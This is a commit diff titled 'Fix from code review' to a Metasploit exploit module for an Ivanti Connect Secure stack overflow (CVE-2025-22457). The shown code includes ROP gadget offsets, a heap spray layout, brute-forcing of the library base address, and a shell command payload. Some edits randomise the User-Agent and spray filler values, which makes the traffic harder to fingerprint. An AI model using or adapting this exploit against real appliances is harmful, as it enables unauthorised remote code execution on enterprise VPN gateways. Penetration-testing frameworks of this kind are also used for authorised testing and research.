Fix from code review

Author: cdelafuente-r7

modules/exploits/linux/http/ivanti_connect_secure_stack_overflow_rce_cve_2025_22457.rb

@@ -80,7 +80,7 @@ def initialize(info = {})
       [
         OptInt.new('MAX_THREADS', [true, 'Max threads to use when spraying', 32]),
         OptInt.new('WEB_CHILDREN', [true, 'The number of /home/bin/web child processes', 4]),
-        OptInt.new('LIBDSPLIBS_ADDRESS', [true, 'Base address of libdsplibs', 0xf6426000]),
+        OptInt.new('LIBDSPLIBS_ADDRESS', [true, 'Lowest possible base address of libdsplibs', 0xf6426000]),
         OptInt.new('BRUTEFORCE_ATTEMPTS', [true, 'The number of attempts to brute force the base address of libdsplibs', 256]),
       ]
     )
@@ -125,7 +125,7 @@ def url_schema
   def check
     print_status("Checking the product version for #{url_schema}://#{rhost}:#{rport}")
 
-    # This has been fixed in version 22.7R2.6, which correspond to 22.7.2 (build 3981)
+    # This has been fixed in version 22.7R2.6, which corresponds to 22.7.2 (build 3981)
     # see https://help.ivanti.com/ps/help/en_US/ICS/22.x/22.7R2/22.xICSRN.pdf
     if Rex::Version.new(product_version) < Rex::Version.new('22.7.2.3981')
       return CheckCode::Appears("Detected version: #{product_version}")
@@ -141,13 +141,10 @@ def target_data
       # 22.7r2.4 b3597 (libdsplibs.so sha1: f31a3cc442df5178b37ea539ff418fec9bf3404f)
       '22.7.2.3597' => {
         overflow_length: 622,
-        # 0x0050c7e6: mov esp, ebp; pop ebp; ret;
-        gadget_mov_esp_ebp_pop_ret: 0x0050c7e6,
+        gadget_mov_esp_ebp_pop_ret: 0x0050c7e6, # mov esp, ebp; pop ebp; ret;
         offset_to_got_plt: 0x0157c000,
-        # 0x00033222: pop ebx; ret;
-        gadget_pop_ebx_ret: 0x00033222,
-        # 0x0087E31F mov [esp], edi; call __ZN5DSSys18isInterfaceEnabledEPKc;
-        gadget_call_system: 0x0087E31F
+        gadget_pop_ebx_ret: 0x00033222, # pop ebx; ret;
+        gadget_call_system: 0x0087E31F # mov [esp], edi; call __ZN5DSSys18isInterfaceEnabledEPKc;
       }
     }
   end
@@ -160,6 +157,35 @@ def send_http_data(data)
     raise IvantiNetworkError, "[send_http_data] Error with the socket: #{e}"
   end
 
+  def user_agent
+    return @user_agent if @user_agent
+
+    # list of valid versions from OpenConnect git repository (https://gitlab.com/openconnect/openconnect)
+    # command used to generate this list: `for tag in HEAD v9.12 v9.11 v9.10; do for i in $(seq 5); do git describe --tags ${tag}~${i}; done; done`
+    @user_agent = %w[
+      v9.12-199-g06afc42b
+      v9.12-198-gb82f00f7
+      v9.12-196-g32971c1b
+      v9.12-195-g9fe01919
+      v9.12-193-ge4cc8a65
+      v9.11-21-g3bc9d788
+      v9.11-20-g3f4f3415
+      v9.11-19-gf6d2c8d8
+      v9.11-18-g0b47190f
+      v9.11-17-g4ca0aa1b
+      v9.10-26-gd40f4370
+      v9.10-24-g5d1b0883
+      v9.10-22-gbaa80279
+      v9.10-21-g3fbba481
+      v9.10-17-g15b4c533
+      v9.01-189-g5aca5431
+      v9.01-188-gb6b85208
+      v9.01-187-g299d4444
+      v9.01-186-gab5f1639
+      v9.01-185-g77838371
+    ].sample
+  end
+
   def make_connections
     print_status('Making connections...')
 
@@ -175,7 +201,7 @@ def make_connections
 
           body = "GET / HTTP/1.1\r\n"
           body << "Host: #{rhost}:#{rport}\r\n"
-          body << "User-Agent: AnyConnect-compatible OpenConnect VPN Agent v9.12-188-gaebfabb3-dirty\r\n"
+          body << "User-Agent: AnyConnect-compatible OpenConnect VPN Agent #{user_agent}\r\n"
           body << "Content-Type: EAP\r\n"
           body << "Upgrade: IF-T/TLS 1.0\r\n"
           body << "Content-Length: 0\r\n"
@@ -202,55 +228,55 @@ def make_connections
   def spray(libdsplibs_base)
     print_status('Spraying...')
 
-    padding = 'D' * 128
+    padding = rand_text(128)
 
     spray_pattern = [
-      # DWORD   , # Address where it will be found after the heap spray
-      0xCAFEF00D, # 0x39393818:
-      0xCAFEF01D, # 0x3939381C:
-      0xCAFEF02D, # 0x39393820:
-      0xCAFEF03D, # 0x39393824:
+      # DWORD   , # Address where the DWORD will be located after the heap spray
+      SecureRandom.rand(2**32), # 0x39393818:
+      SecureRandom.rand(2**32), # 0x3939381C:
+      SecureRandom.rand(2**32), # 0x39393820:
+      SecureRandom.rand(2**32), # 0x39393824:
 
       libdsplibs_base + @target[:gadget_mov_esp_ebp_pop_ret], # 0x39393828: <--- initial eip control, stack pivot gadget.
       0x39393828 - 0x10, # 0x3939382C:
-      0xCAFEF06D, # 0x39393830: <--- points here @ ebp (rop: pop ebp)
+      SecureRandom.rand(2**32), # 0x39393830: <--- points here @ ebp (rop: pop ebp)
       libdsplibs_base + @target[:gadget_pop_ebx_ret], # 0x39393834:
 
       libdsplibs_base + @target[:offset_to_got_plt], # 0x39393838: <--- eax (rop pop ebx)
       libdsplibs_base + @target[:gadget_call_system], # 0x3939383C:
-      0xCAFEF0AD, # 0x39393840:
-      0xCAFEF0BD, # 0x39393844:
+      SecureRandom.rand(2**32), # 0x39393840:
+      SecureRandom.rand(2**32), # 0x39393844:
 
-      0xCAFEF0CD, # 0x39393848:
-      0xCAFEF0DD, # 0x3939384C:
-      0xCAFEF0ED, # 0x39393850:
-      0xCAFEF0FD, # 0x39393854:
+      SecureRandom.rand(2**32), # 0x39393848:
+      SecureRandom.rand(2**32), # 0x3939384C:
+      SecureRandom.rand(2**32), # 0x39393850:
+      SecureRandom.rand(2**32), # 0x39393854:
 
-      0xCAFEF10D, # 0x39393858:
-      0x3939382C, # 0x3939385C: <--- 0x39393830+0x2c ->> edx 0x3939382C
-      0xCAFEF12D, # 0x39393860:
-      0xCAFEF13D, # 0x39393864:
+      SecureRandom.rand(2**32), # 0x39393858:
+      0x3939382C, # 0x3939385C: <--- ctx->dword2C (0x39393830+0x2c)
+      SecureRandom.rand(2**32), # 0x39393860:
+      SecureRandom.rand(2**32), # 0x39393864:
 
       0x39393918, # 0x39393868: <--- ptr to shell_cmd, referenced @ edi
-      0xCAFEF15D, # 0x3939386C:
-      0xCAFEF16D, # 0x39393870:
-      0xCAFEF17D, # 0x39393874:
+      SecureRandom.rand(2**32), # 0x3939386C:
+      SecureRandom.rand(2**32), # 0x39393870:
+      SecureRandom.rand(2**32), # 0x39393874:
 
-      0xCAFEF18D, # 0x39393878:
-      0xCAFEF19D, # 0x3939387C:
-      0xCAFEF1AD, # 0x39393880:
-      0xCAFEF1BD, # 0x39393884:
+      SecureRandom.rand(2**32), # 0x39393878:
+      SecureRandom.rand(2**32), # 0x3939387C:
+      SecureRandom.rand(2**32), # 0x39393880:
+      SecureRandom.rand(2**32), # 0x39393884:
 
-      0xCAFEF1CD, # 0x39393888:
-      0x41414141, # 0x3939388C: <--- last EIP after payload exits.
-      0xCAFEF1ED, # 0x39393890:
-      0x00000000  # 0x39393894: 0x39393830+0x64, this is ctx->max_headers and lets us bail out of the headers loop early.
+      SecureRandom.rand(2**32), # 0x39393888:
+      SecureRandom.rand(2**32), # 0x3939388C:
+      SecureRandom.rand(2**32), # 0x39393890:
+      0x00000000 # 0x39393894: 0x39393830+0x64, this is ctx->max_headers and lets us bail out of the headers loop early.
 
       # padding...
       # 0x39393918: shell_cmd @ edi
     ].pack('V*') + padding + @shell_cmd
 
-    fail_with(Failure::BadConfig, 'spray_pattern should be 256 bytes') unless spray_pattern.length == 512
+    fail_with(Failure::BadConfig, 'spray_pattern should be 512 bytes') unless spray_pattern.length == 512
 
     heap_buffer = spray_pattern * ((1024 * 1024 * 3) / spray_pattern.length)
 
@@ -351,7 +377,7 @@ def exploit
     libdsplibs_base = datastore['LIBDSPLIBS_ADDRESS']
 
     _, elapsed_time = Rex::Stopwatch.elapsed_time do
-      # with 8 bits of entroy, we should guess correctly every ~256 attempts (2**8).
+      # with 8 bits of entropy, we should guess correctly every ~256 attempts (2**8).
       0.upto(datastore['BRUTEFORCE_ATTEMPTS'] - 1) do
         _, attempt_elapsed_time = Rex::Stopwatch.elapsed_time do
           attempt_exploit(libdsplibs_base)